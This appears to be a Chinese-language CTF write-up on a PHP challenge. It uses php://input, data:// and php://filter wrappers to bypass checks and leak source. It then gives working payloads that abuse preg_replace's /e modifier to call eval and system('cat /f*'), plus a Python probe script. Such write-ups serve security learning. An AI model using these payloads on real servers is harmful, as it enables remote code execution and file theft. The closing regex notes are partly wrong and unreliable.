wp
打开环境,还是代码
<?php
error_reporting(0);
$text = $_GET["text"];
$file = $_GET["file"];
if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){
echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
if(preg_match("/flag/",$file)){
die("Not now!");
}
include($file); //next.php
}
else{
highlight_file(__FILE__);
}
?>
绕过text和file简单,就是php伪协议
text=php://input,POST内容:I have a dream
或者:text=data://text/plain;base64,SSBoYXZlIGEgZHJlYW0=
file=php://filter/read=convert.base64-encode/resource=next.php
得到next.php的源码
<?php
$id = $_GET['id'];
$_SESSION['id'] = $id;
function complex($re, $str) {
return preg_replace(
'/(' . $re . ')/ei',
'strtolower("\\1")',
$str
);
}
foreach($_GET as $re => $str) {
echo complex($re, $str). "\n";
}
function getFlag(){
@eval($_GET['cmd']);
}
?>
这儿就是一个preg_replace的/e模式与代码执行
preg_replace的简介
preg_replace的/e模式,可以让replacement(第二个参数)的内容来代码执行。
preg_replace的/e模式与代码执行
其中对正则反向引用的理解
反向引用就是正则匹配到后,匹配的内容确定,由\1来控制
下面是我的理解
题目的意思:先匹配到value的东西,然后,替换replacement的东西,/e模式下代码执行,相当于就
执行“\1组”里的代码。
所以payload
payload:?\S*=${getFlag()}&cmd=system("cat /f*");
or:?\S*=${eval($_POST[1])},POST内容:1=system("cat /f*");
这里正则不能用 .* 来匹配,因为.开头,会变成_
exp
import requests
for i in range(0,256):
url="http://127.0.0.1/index.php?id=1&i"+chr(i)+"d1=1"
r=requests.get(url)
if '_' in r.content:
print(str(i)+':'+chr(i))
其他知识点
php可变变量
https://www.php.net/manual/zh/language.variables.variable.php
<?php
$a='hello';
$$a='world',$$a变量就等于$hello
echo $a ${$a},使用{}是为了明确这个变量。
?>
正则表达式
\w 匹配字母或数字或下划线或汉字 等价于 '[^A-Za-z0-9_]'。
\s 匹配任意的空白符,\S是匹配除空白符的所有字符
\d 匹配数字
\b 匹配单词的开始或结束
^ 匹配字符串的开始
$ 匹配字符串的结束
匹配模式(preg_replace)
1、/g 表示该表达式将用来在输入字符串中查找所有可能的匹配,返回的结果可以是多个。如果不加/g最多只会匹配一个
2、/i 表示匹配的时候不区分大小写,这个跟其它语言的正则用法相同
3、/m 表示多行匹配。什么是多行匹配呢?就是匹配换行符两端的潜在匹配。影响正则中的^$符号
4、/s 与/m相对,单行模式匹配。
5、/e 可执行模式,此为PHP专有参数,例如preg_replace函数。
6、/x 忽略空白模式。
参考:
https://www.runoob.com/regexp/regexp-syntax.html